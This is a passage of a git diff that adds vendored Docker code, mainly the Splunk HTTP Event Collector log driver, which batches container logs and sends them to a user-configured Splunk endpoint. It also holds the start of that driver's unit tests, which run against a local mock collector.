+func (w *RotateFileWriter) MaxFiles() int {
+	return w.maxFiles
+}
+
+//NotifyRotate returns the new subscriber
+func (w *RotateFileWriter) NotifyRotate() chan interface{} {
+	return w.notifyRotate.Subscribe()
+}
+
+//NotifyRotateEvict removes the specified subscriber from receiving any more messages.
+func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) {
+	w.notifyRotate.Evict(sub)
+}
+
+// Close closes underlying file and signals all readers to stop.
+func (w *RotateFileWriter) Close() error {
+	return w.f.Close()
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
new file mode 100644
index 0000000000..f85832681a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go
@@ -0,0 +1,621 @@
+// Package splunk provides the log driver for forwarding server logs to
+// Splunk HTTP Event Collector endpoint.
+package splunk
+
+import (
+	"bytes"
+	"compress/gzip"
+	"crypto/tls"
+	"crypto/x509"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"strconv"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/loggerutils"
+	"github.com/docker/docker/pkg/urlutil"
+)
+
+const (
+	driverName                    = "splunk"
+	splunkURLKey                  = "splunk-url"
+	splunkTokenKey                = "splunk-token"
+	splunkSourceKey               = "splunk-source"
+	splunkSourceTypeKey           = "splunk-sourcetype"
+	splunkIndexKey                = "splunk-index"
+	splunkCAPathKey               = "splunk-capath"
+	splunkCANameKey               = "splunk-caname"
+	splunkInsecureSkipVerifyKey   = "splunk-insecureskipverify"
+	splunkFormatKey               = "splunk-format"
+	splunkVerifyConnectionKey     = "splunk-verify-connection"
+	splunkGzipCompressionKey      = "splunk-gzip"
+	splunkGzipCompressionLevelKey = "splunk-gzip-level"
+	envKey                        = "env"
+	labelsKey                     = "labels"
+	tagKey                        = "tag"
+)
+
+const (
+	// How often do we send messages (if we are not reaching batch size)
+	defaultPostMessagesFrequency = 5 * time.Second
+	// How big can be batch of messages
+	defaultPostMessagesBatchSize = 1000
+	// Maximum number of messages we can store in buffer
+	defaultBufferMaximum = 10 * defaultPostMessagesBatchSize
+	// Number of messages allowed to be queued in the channel
+	defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize
+)
+
+const (
+	envVarPostMessagesFrequency = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_FREQUENCY"
+	envVarPostMessagesBatchSize = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_BATCH_SIZE"
+	envVarBufferMaximum         = "SPLUNK_LOGGING_DRIVER_BUFFER_MAX"
+	envVarStreamChannelSize     = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE"
+)
+
+type splunkLoggerInterface interface {
+	logger.Logger
+	worker()
+}
+
+type splunkLogger struct {
+	client    *http.Client
+	transport *http.Transport
+
+	url         string
+	auth        string
+	nullMessage *splunkMessage
+
+	// http compression
+	gzipCompression      bool
+	gzipCompressionLevel int
+
+	// Advanced options
+	postMessagesFrequency time.Duration
+	postMessagesBatchSize int
+	bufferMaximum         int
+
+	// For synchronization between background worker and logger.
+	// We use channel to send messages to worker go routine.
+	// All other variables for blocking Close call before we flush all messages to HEC
+	stream     chan *splunkMessage
+	lock       sync.RWMutex
+	closed     bool
+	closedCond *sync.Cond
+}
+
+type splunkLoggerInline struct {
+	*splunkLogger
+
+	nullEvent *splunkMessageEvent
+}
+
+type splunkLoggerJSON struct {
+	*splunkLoggerInline
+}
+
+type splunkLoggerRaw struct {
+	*splunkLogger
+
+	prefix []byte
+}
+
+type splunkMessage struct {
+	Event      interface{} `json:"event"`
+	Time       string      `json:"time"`
+	Host       string      `json:"host"`
+	Source     string      `json:"source,omitempty"`
+	SourceType string      `json:"sourcetype,omitempty"`
+	Index      string      `json:"index,omitempty"`
+}
+
+type splunkMessageEvent struct {
+	Line   interface{}       `json:"line"`
+	Source string            `json:"source"`
+	Tag    string            `json:"tag,omitempty"`
+	Attrs  map[string]string `json:"attrs,omitempty"`
+}
+
+const (
+	splunkFormatRaw    = "raw"
+	splunkFormatJSON   = "json"
+	splunkFormatInline = "inline"
+)
+
+func init() {
+	if err := logger.RegisterLogDriver(driverName, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(driverName, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates splunk logger driver using configuration passed in context
+func New(ctx logger.Context) (logger.Logger, error) {
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName)
+	}
+
+	// Parse and validate Splunk URL
+	splunkURL, err := parseURL(ctx)
+	if err != nil {
+		return nil, err
+	}
+
+	// Splunk Token is required parameter
+	splunkToken, ok := ctx.Config[splunkTokenKey]
+	if !ok {
+		return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey)
+	}
+
+	tlsConfig := &tls.Config{}
+
+	// Splunk is using autogenerated certificates by default,
+	// allow users to trust them with skipping verification
+	if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok {
+		insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr)
+		if err != nil {
+			return nil, err
+		}
+		tlsConfig.InsecureSkipVerify = insecureSkipVerify
+	}
+
+	// If path to the root certificate is provided - load it
+	if caPath, ok := ctx.Config[splunkCAPathKey]; ok {
+		caCert, err := ioutil.ReadFile(caPath)
+		if err != nil {
+			return nil, err
+		}
+		caPool := x509.NewCertPool()
+		caPool.AppendCertsFromPEM(caCert)
+		tlsConfig.RootCAs = caPool
+	}
+
+	if caName, ok := ctx.Config[splunkCANameKey]; ok {
+		tlsConfig.ServerName = caName
+	}
+
+	gzipCompression := false
+	if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok {
+		gzipCompression, err = strconv.ParseBool(gzipCompressionStr)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	gzipCompressionLevel := gzip.DefaultCompression
+	if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok {
+		var err error
+		gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32)
+		if err != nil {
+			return nil, err
+		}
+		gzipCompressionLevel = int(gzipCompressionLevel64)
+		if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression {
+			err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).",
+				gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression)
+			return nil, err
+		}
+	}
+
+	transport := &http.Transport{
+		TLSClientConfig: tlsConfig,
+	}
+	client := &http.Client{
+		Transport: transport,
+	}
+
+	source := ctx.Config[splunkSourceKey]
+	sourceType := ctx.Config[splunkSourceTypeKey]
+	index := ctx.Config[splunkIndexKey]
+
+	var nullMessage = &splunkMessage{
+		Host:       hostname,
+		Source:     source,
+		SourceType: sourceType,
+		Index:      index,
+	}
+
+	// Allow user to remove tag from the messages by setting tag to empty string
+	tag := ""
+	if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" {
+		tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	attrs := ctx.ExtraAttributes(nil)
+
+	var (
+		postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency)
+		postMessagesBatchSize = getAdvancedOptionInt(envVarPostMessagesBatchSize, defaultPostMessagesBatchSize)
+		bufferMaximum         = getAdvancedOptionInt(envVarBufferMaximum, defaultBufferMaximum)
+		streamChannelSize     = getAdvancedOptionInt(envVarStreamChannelSize, defaultStreamChannelSize)
+	)
+
+	logger := &splunkLogger{
+		client:                client,
+		transport:             transport,
+		url:                   splunkURL.String(),
+		auth:                  "Splunk " + splunkToken,
+		nullMessage:           nullMessage,
+		gzipCompression:       gzipCompression,
+		gzipCompressionLevel:  gzipCompressionLevel,
+		stream:                make(chan *splunkMessage, streamChannelSize),
+		postMessagesFrequency: postMessagesFrequency,
+		postMessagesBatchSize: postMessagesBatchSize,
+		bufferMaximum:         bufferMaximum,
+	}
+
+	// By default we verify connection, but we allow use to skip that
+	verifyConnection := true
+	if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok {
+		var err error
+		verifyConnection, err = strconv.ParseBool(verifyConnectionStr)
+		if err != nil {
+			return nil, err
+		}
+	}
+	if verifyConnection {
+		err = verifySplunkConnection(logger)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	var splunkFormat string
+	if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; ok {
+		switch splunkFormatParsed {
+		case splunkFormatInline:
+		case splunkFormatJSON:
+		case splunkFormatRaw:
+		default:
+			return nil, fmt.Errorf("Unknown format specified %s, supported formats are inline, json and raw", splunkFormat)
+		}
+		splunkFormat = splunkFormatParsed
+	} else {
+		splunkFormat = splunkFormatInline
+	}
+
+	var loggerWrapper splunkLoggerInterface
+
+	switch splunkFormat {
+	case splunkFormatInline:
+		nullEvent := &splunkMessageEvent{
+			Tag:   tag,
+			Attrs: attrs,
+		}
+
+		loggerWrapper = &splunkLoggerInline{logger, nullEvent}
+	case splunkFormatJSON:
+		nullEvent := &splunkMessageEvent{
+			Tag:   tag,
+			Attrs: attrs,
+		}
+
+		loggerWrapper = &splunkLoggerJSON{&splunkLoggerInline{logger, nullEvent}}
+	case splunkFormatRaw:
+		var prefix bytes.Buffer
+		if tag != "" {
+			prefix.WriteString(tag)
+			prefix.WriteString(" ")
+		}
+		for key, value := range attrs {
+			prefix.WriteString(key)
+			prefix.WriteString("=")
+			prefix.WriteString(value)
+			prefix.WriteString(" ")
+		}
+
+		loggerWrapper = &splunkLoggerRaw{logger, prefix.Bytes()}
+	default:
+		return nil, fmt.Errorf("Unexpected format %s", splunkFormat)
+	}
+
+	go loggerWrapper.worker()
+
+	return loggerWrapper, nil
+}
+
+func (l *splunkLoggerInline) Log(msg *logger.Message) error {
+	message := l.createSplunkMessage(msg)
+
+	event := *l.nullEvent
+	event.Line = string(msg.Line)
+	event.Source = msg.Source
+
+	message.Event = &event
+
+	return l.queueMessageAsync(message)
+}
+
+func (l *splunkLoggerJSON) Log(msg *logger.Message) error {
+	message := l.createSplunkMessage(msg)
+	event := *l.nullEvent
+
+	var rawJSONMessage json.RawMessage
+	if err := json.Unmarshal(msg.Line, &rawJSONMessage); err == nil {
+		event.Line = &rawJSONMessage
+	} else {
+		event.Line = string(msg.Line)
+	}
+
+	event.Source = msg.Source
+
+	message.Event = &event
+
+	return l.queueMessageAsync(message)
+}
+
+func (l *splunkLoggerRaw) Log(msg *logger.Message) error {
+	message := l.createSplunkMessage(msg)
+
+	message.Event = string(append(l.prefix, msg.Line...))
+
+	return l.queueMessageAsync(message)
+}
+
+func (l *splunkLogger) queueMessageAsync(message *splunkMessage) error {
+	l.lock.RLock()
+	defer l.lock.RUnlock()
+	if l.closedCond != nil {
+		return fmt.Errorf("%s: driver is closed", driverName)
+	}
+	l.stream <- message
+	return nil
+}
+
+func (l *splunkLogger) worker() {
+	timer := time.NewTicker(l.postMessagesFrequency)
+	var messages []*splunkMessage
+	for {
+		select {
+		case message, open := <-l.stream:
+			if !open {
+				l.postMessages(messages, true)
+				l.lock.Lock()
+				defer l.lock.Unlock()
+				l.transport.CloseIdleConnections()
+				l.closed = true
+				l.closedCond.Signal()
+				return
+			}
+			messages = append(messages, message)
+			// Only sending when we get exactly to the batch size,
+			// This also helps not to fire postMessages on every new message,
+			// when previous try failed.
+			if len(messages)%l.postMessagesBatchSize == 0 {
+				messages = l.postMessages(messages, false)
+			}
+		case <-timer.C:
+			messages = l.postMessages(messages, false)
+		}
+	}
+}
+
+func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage {
+	messagesLen := len(messages)
+	for i := 0; i < messagesLen; i += l.postMessagesBatchSize {
+		upperBound := i + l.postMessagesBatchSize
+		if upperBound > messagesLen {
+			upperBound = messagesLen
+		}
+		if err := l.tryPostMessages(messages[i:upperBound]); err != nil {
+			logrus.Error(err)
+			if messagesLen-i >= l.bufferMaximum || lastChance {
+				// If this is last chance - print them all to the daemon log
+				if lastChance {
+					upperBound = messagesLen
+				}
+				// Not all sent, but buffer has got to its maximum, let's log all messages
+				// we could not send and return buffer minus one batch size
+				for j := i; j < upperBound; j++ {
+					if jsonEvent, err := json.Marshal(messages[j]); err != nil {
+						logrus.Error(err)
+					} else {
+						logrus.Error(fmt.Errorf("Failed to send a message '%s'", string(jsonEvent)))
+					}
+				}
+				return messages[upperBound:messagesLen]
+			}
+			// Not all sent, returning buffer from where we have not sent messages
+			return messages[i:messagesLen]
+		}
+	}
+	// All sent, return empty buffer
+	return messages[:0]
+}
+
+func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error {
+	if len(messages) == 0 {
+		return nil
+	}
+	var buffer bytes.Buffer
+	var writer io.Writer
+	var gzipWriter *gzip.Writer
+	var err error
+	// If gzip compression is enabled - create gzip writer with specified compression
+	// level. If gzip compression is disabled, use standard buffer as a writer
+	if l.gzipCompression {
+		gzipWriter, err = gzip.NewWriterLevel(&buffer, l.gzipCompressionLevel)
+		if err != nil {
+			return err
+		}
+		writer = gzipWriter
+	} else {
+		writer = &buffer
+	}
+	for _, message := range messages {
+		jsonEvent, err := json.Marshal(message)
+		if err != nil {
+			return err
+		}
+		if _, err := writer.Write(jsonEvent); err != nil {
+			return err
+		}
+	}
+	// If gzip compression is enabled, tell it, that we are done
+	if l.gzipCompression {
+		err = gzipWriter.Close()
+		if err != nil {
+			return err
+		}
+	}
+	req, err := http.NewRequest("POST", l.url, bytes.NewBuffer(buffer.Bytes()))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Authorization", l.auth)
+	// Tell if we are sending gzip compressed body
+	if l.gzipCompression {
+		req.Header.Set("Content-Encoding", "gzip")
+	}
+	res, err := l.client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer res.Body.Close()
+	if res.StatusCode != http.StatusOK {
+		var body []byte
+		body, err = ioutil.ReadAll(res.Body)
+		if err != nil {
+			return err
+		}
+		return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body)
+	}
+	io.Copy(ioutil.Discard, res.Body)
+	return nil
+}
+
+func (l *splunkLogger) Close() error {
+	l.lock.Lock()
+	defer l.lock.Unlock()
+	if l.closedCond == nil {
+		l.closedCond = sync.NewCond(&l.lock)
+		close(l.stream)
+		for !l.closed {
+			l.closedCond.Wait()
+		}
+	}
+	return nil
+}
+
+func (l *splunkLogger) Name() string {
+	return driverName
+}
+
+func (l *splunkLogger) createSplunkMessage(msg *logger.Message) *splunkMessage {
+	message := *l.nullMessage
+	message.Time = fmt.Sprintf("%f", float64(msg.Timestamp.UnixNano())/float64(time.Second))
+	return &message
+}
+
+// ValidateLogOpt looks for all supported by splunk driver options
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case splunkURLKey:
+		case splunkTokenKey:
+		case splunkSourceKey:
+		case splunkSourceTypeKey:
+		case splunkIndexKey:
+		case splunkCAPathKey:
+		case splunkCANameKey:
+		case splunkInsecureSkipVerifyKey:
+		case splunkFormatKey:
+		case splunkVerifyConnectionKey:
+		case splunkGzipCompressionKey:
+		case splunkGzipCompressionLevelKey:
+		case envKey:
+		case labelsKey:
+		case tagKey:
+		default:
+			return fmt.Errorf("unknown log opt '%s' for %s log driver", key, driverName)
+		}
+	}
+	return nil
+}
+
+func parseURL(ctx logger.Context) (*url.URL, error) {
+	splunkURLStr, ok := ctx.Config[splunkURLKey]
+	if !ok {
+		return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey)
+	}
+
+	splunkURL, err := url.Parse(splunkURLStr)
+	if err != nil {
+		return nil, fmt.Errorf("%s: failed to parse %s as url value in %s", driverName, splunkURLStr, splunkURLKey)
+	}
+
+	if !urlutil.IsURL(splunkURLStr) ||
+		!splunkURL.IsAbs() ||
+		(splunkURL.Path != "" && splunkURL.Path != "/") ||
+		splunkURL.RawQuery != "" ||
+		splunkURL.Fragment != "" {
+		return nil, fmt.Errorf("%s: expected format scheme://dns_name_or_ip:port for %s", driverName, splunkURLKey)
+	}
+
+	splunkURL.Path = "/services/collector/event/1.0"
+
+	return splunkURL, nil
+}
+
+func verifySplunkConnection(l *splunkLogger) error {
+	req, err := http.NewRequest(http.MethodOptions, l.url, nil)
+	if err != nil {
+		return err
+	}
+	res, err := l.client.Do(req)
+	if err != nil {
+		return err
+	}
+	if res.Body != nil {
+		defer res.Body.Close()
+	}
+	if res.StatusCode != http.StatusOK {
+		var body []byte
+		body, err = ioutil.ReadAll(res.Body)
+		if err != nil {
+			return err
+		}
+		return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body)
+	}
+	return nil
+}
+
+func getAdvancedOptionDuration(envName string, defaultValue time.Duration) time.Duration {
+	valueStr := os.Getenv(envName)
+	if valueStr == "" {
+		return defaultValue
+	}
+	parsedValue, err := time.ParseDuration(valueStr)
+	if err != nil {
+		logrus.Error(fmt.Sprintf("Failed to parse value of %s as duration. Using default %v. %v", envName, defaultValue, err))
+		return defaultValue
+	}
+	return parsedValue
+}
+
+func getAdvancedOptionInt(envName string, defaultValue int) int {
+	valueStr := os.Getenv(envName)
+	if valueStr == "" {
+		return defaultValue
+	}
+	parsedValue, err := strconv.ParseInt(valueStr, 10, 32)
+	if err != nil {
+		logrus.Error(fmt.Sprintf("Failed to parse value of %s as integer. Using default %d. %v", envName, defaultValue, err))
+		return defaultValue
+	}
+	return int(parsedValue)
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
new file mode 100644
index 0000000000..df74cbad5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go
@@ -0,0 +1,1302 @@
+package splunk
+
+import (
+	"compress/gzip"
+	"fmt"
+	"os"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/daemon/logger"
+)
+
+// Validate options
+func TestValidateLogOpt(t *testing.T) {
+	err := ValidateLogOpt(map[string]string{
+		splunkURLKey:                  "http://127.0.0.1",
+		splunkTokenKey:                "2160C7EF-2CE9-4307-A180-F852B99CF417",
+		splunkSourceKey:               "mysource",
+		splunkSourceTypeKey:           "mysourcetype",
+		splunkIndexKey:                "myindex",
+		splunkCAPathKey:               "/usr/cert.pem",
+		splunkCANameKey:               "ca_name",
+		splunkInsecureSkipVerifyKey:   "true",
+		splunkFormatKey:               "json",
+		splunkVerifyConnectionKey:     "true",
+		splunkGzipCompressionKey:      "true",
+		splunkGzipCompressionLevelKey: "1",
+		envKey:    "a",
+		labelsKey: "b",
+		tagKey:    "c",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = ValidateLogOpt(map[string]string{
+		"not-supported-option": "a",
+	})
+	if err == nil {
+		t.Fatal("Expecting error on unsupported options")
+	}
+}
+
+// Driver require user to specify required options
+func TestNewMissedConfig(t *testing.T) {
+	ctx := logger.Context{
+		Config: map[string]string{},
+	}
+	_, err := New(ctx)
+	if err == nil {
+		t.Fatal("Logger driver should fail when no required parameters specified")
+	}
+}
+
+// Driver require user to specify splunk-url
+func TestNewMissedUrl(t *testing.T) {
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkTokenKey: "4642492F-D8BD-47F1-A005-0C08AE4657DF",
+		},
+	}
+	_, err := New(ctx)
+	if err.Error() != "splunk: splunk-url is expected" {
+		t.Fatal("Logger driver should fail when no required parameters specified")
+	}
+}
+
+// Driver require user to specify splunk-token
+func TestNewMissedToken(t *testing.T) {
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey: "http://127.0.0.1:8088",
+		},
+	}
+	_, err := New(ctx)
+	if err.Error() != "splunk: splunk-token is expected" {
+		t.Fatal("Logger driver should fail when no required parameters specified")
+	}
+}
+
+// Test default settings
+func TestDefault(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if loggerDriver.Name() != driverName {
+		t.Fatal("Unexpected logger driver name")
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "" ||
+		splunkLoggerDriver.nullMessage.SourceType != "" ||
+		splunkLoggerDriver.nullMessage.Index != "" ||
+		splunkLoggerDriver.gzipCompression != false ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize {
+		t.Fatal("Found not default values setup in Splunk Logging Driver.")
+	}
+
+	message1Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+	message2Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 2 {
+		t.Fatal("Expected two messages")
+	}
+
+	if *hec.gzipEnabled {
+		t.Fatal("Gzip should not be used")
+	}
+
+	message1 := hec.messages[0]
+	if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) ||
+		message1.Host != hostname ||
+		message1.Source != "" ||
+		message1.SourceType != "" ||
+		message1.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message1)
+	}
+
+	if event, err := message1.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"] != "{\"a\":\"b\"}" ||
+			event["source"] != "stdout" ||
+			event["tag"] != "containeriid" ||
+			len(event) != 3 {
+			t.Fatalf("Unexpected event in message %v", event)
+		}
+	}
+
+	message2 := hec.messages[1]
+	if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) ||
+		message2.Host != hostname ||
+		message2.Source != "" ||
+		message2.SourceType != "" ||
+		message2.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message2)
+	}
+
+	if event, err := message2.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"] != "notajson" ||
+			event["source"] != "stdout" ||
+			event["tag"] != "containeriid" ||
+			len(event) != 3 {
+			t.Fatalf("Unexpected event in message %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify inline format with a not default settings for most of options
+func TestInlineFormatWithNonDefaultOptions(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:             hec.URL(),
+			splunkTokenKey:           hec.token,
+			splunkSourceKey:          "mysource",
+			splunkSourceTypeKey:      "mysourcetype",
+			splunkIndexKey:           "myindex",
+			splunkFormatKey:          splunkFormatInline,
+			splunkGzipCompressionKey: "true",
+			tagKey:    "{{.ImageName}}/{{.Name}}",
+			labelsKey: "a",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+		ContainerLabels: map[string]string{
+			"a": "b",
+		},
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "mysource" ||
+		splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" ||
+		splunkLoggerDriver.nullMessage.Index != "myindex" ||
+		splunkLoggerDriver.gzipCompression != true ||
+		splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize {
+		t.Fatal("Values do not match configuration.")
+	}
+
+	messageTime := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 1 {
+		t.Fatal("Expected one message")
+	}
+
+	if !*hec.gzipEnabled {
+		t.Fatal("Gzip should be used")
+	}
+
+	message := hec.messages[0]
+	if message.Time != fmt.Sprintf("%f", float64(messageTime.UnixNano())/float64(time.Second)) ||
+		message.Host != hostname ||
+		message.Source != "mysource" ||
+		message.SourceType != "mysourcetype" ||
+		message.Index != "myindex" {
+		t.Fatalf("Unexpected values of message %v", message)
+	}
+
+	if event, err := message.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"] != "1" ||
+			event["source"] != "stdout" ||
+			event["tag"] != "container_image_name/container_name" ||
+			event["attrs"].(map[string]interface{})["a"] != "b" ||
+			len(event) != 4 {
+			t.Fatalf("Unexpected event in message %v", event)
+		}
+	}
+
+	err = hec.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+// Verify JSON format
+func TestJsonFormat(t *testing.T) {
+	hec := NewHTTPEventCollectorMock(t)
+
+	go hec.Serve()
+
+	ctx := logger.Context{
+		Config: map[string]string{
+			splunkURLKey:                  hec.URL(),
+			splunkTokenKey:                hec.token,
+			splunkFormatKey:               splunkFormatJSON,
+			splunkGzipCompressionKey:      "true",
+			splunkGzipCompressionLevelKey: "1",
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	hostname, err := ctx.Hostname()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	loggerDriver, err := New(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !hec.connectionVerified {
+		t.Fatal("By default connection should be verified")
+	}
+
+	splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerJSON)
+	if !ok {
+		t.Fatal("Unexpected Splunk Logging Driver type")
+	}
+
+	if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" ||
+		splunkLoggerDriver.auth != "Splunk "+hec.token ||
+		splunkLoggerDriver.nullMessage.Host != hostname ||
+		splunkLoggerDriver.nullMessage.Source != "" ||
+		splunkLoggerDriver.nullMessage.SourceType != "" ||
+		splunkLoggerDriver.nullMessage.Index != "" ||
+		splunkLoggerDriver.gzipCompression != true ||
+		splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed ||
+		splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency ||
+		splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize ||
+		splunkLoggerDriver.bufferMaximum != defaultBufferMaximum ||
+		cap(splunkLoggerDriver.stream) != defaultStreamChannelSize {
+		t.Fatal("Values do not match configuration.")
+	}
+
+	message1Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+	message2Time := time.Now()
+	if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil {
+		t.Fatal(err)
+	}
+
+	err = loggerDriver.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(hec.messages) != 2 {
+		t.Fatal("Expected two messages")
+	}
+
+	message1 := hec.messages[0]
+	if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) ||
+		message1.Host != hostname ||
+		message1.Source != "" ||
+		message1.SourceType != "" ||
+		message1.Index != "" {
+		t.Fatalf("Unexpected values of message 1 %v", message1)
+	}
+
+	if event, err := message1.EventAsMap(); err != nil {
+		t.Fatal(err)
+	} else {
+		if event["line"].(map[string]interface{})["a"] != "b" ||
+			event["source"] != "stdout" ||
+			event["tag"] != "containeriid" ||
+			len(event) != 3 {
